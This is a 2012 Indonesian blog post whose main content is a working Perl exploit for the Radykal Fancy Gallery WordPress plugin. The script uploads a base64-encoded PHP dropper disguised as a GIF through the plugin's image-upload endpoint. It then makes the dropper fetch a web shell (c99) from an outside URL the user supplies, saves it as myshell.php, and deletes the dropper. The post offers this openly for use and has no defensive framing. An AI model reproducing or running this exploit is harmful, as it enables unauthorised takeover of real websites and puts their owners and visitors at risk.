Senin, 16 Juli 2012

[PERL] Exploit Radykal Fancy Gallery

#!/usr/bin/perl

print "################################################################\n";
print "                Radykal Fancy Gallery Exploit\n";
print " Author   : Jefry AnasKi\n";
print " Contact  : jefry@anaski.net\n";
print " Homepage : www.anaski.net | blog.anaski.net\n";
print " Thank to :\n";
print "             BlueBoyz, AnasKi CreW, ExploreCrew\n";
print "################################################################\n";

use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
use LWP::Simple;                          
use LWP 5.64;
use LWP::UserAgent;
use Socket;                                  
use IO::Socket;                              
use IO::Socket::INET;                      
use IO::Select;   
use MIME::Base64;
use Cwd 'abs_path';
system 'clear';
system 'cls';

print "\r\nmasukan url target \r\n";
print "ex : http://blog.anaski.net/\r\n";
print "==> ";
my $web = <STDIN>;
chop($web);
my $url = $web."/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php";
my $path = abs_path($0);
my $shell = "R0lGODlhAT8BPz8/P////yH5BAE/Pz8/LD8/Pz8BPwE/PwICRAE/Oz88P3BocA0KICAgICAgICAgICAgJHNoeCA9IEAkX0dFVFsidXJsIl07DQoJCQlAY29weSgiJHNoeCIsIm15c2hlbGwucGhwIik7DQoJaWYgKEAkX0dFVFsnYWN0J109PSAnZGVsJyl7ICAgDQogICAgICAgIGlmICh1bmxpbmsoX19GSUxFX18pKSB7IEBvYl9jbGVhbigpOyBlY2hvICI8YnIvPkpGcnlfIFdhcyBIZXJlISI7IH0NCiAgICAgICAgZWxzZSB7IGVjaG8gIjxjZW50ZXI+PGI+Q2FuJ3QgZGVsZXRlICIuX19GSUxFX18uIiE8L2I+PC9jZW50ZXI+IjsgfQ0KICB9DQo/Pg";
my $sh = decode_base64($shell);
open (code, '>exp.php');
print code $sh;
close (code);

my     $ua = LWP::UserAgent->new;
    $ua->agent("Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54)");
my $get = $ua->post ($url, "Content" => ["file[]" => ["exp.php"]],'Content_Type' => 'form-data')->as_string;
    $ua->timeout(7);

if ($get =~ /error":0/ ) {
    print "\r\nmasukan url shell \r\n";
    print "ex : http://anaski.net/tool/c99.txt\r\n";
    print "==> ";

    my $hasil = <STDIN>;
    chop($hasil);
    my ($urlx) = ($get =~ /realFile":"(.*)"}/);
    my ($exp) = ($url =~ /(.*)image-upload.php/);
    &openweb($exp.$urlx."?&url=".$hasil);
    &openweb($exp.$urlx."?&act=del");
    print "\r\nhasil ==> ".$exp."/myshell.php\r\n";
  
} elsif ($get =~ /"error":1/ ){
    print "File exp.php is not an image";
} else {
    print "Silahkan Cari Target Lain";
}



sub openweb() {
    my $url = $_[0];
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}
 
refrensi : http://forum.explorecrew.org/index.php?topic=1166.0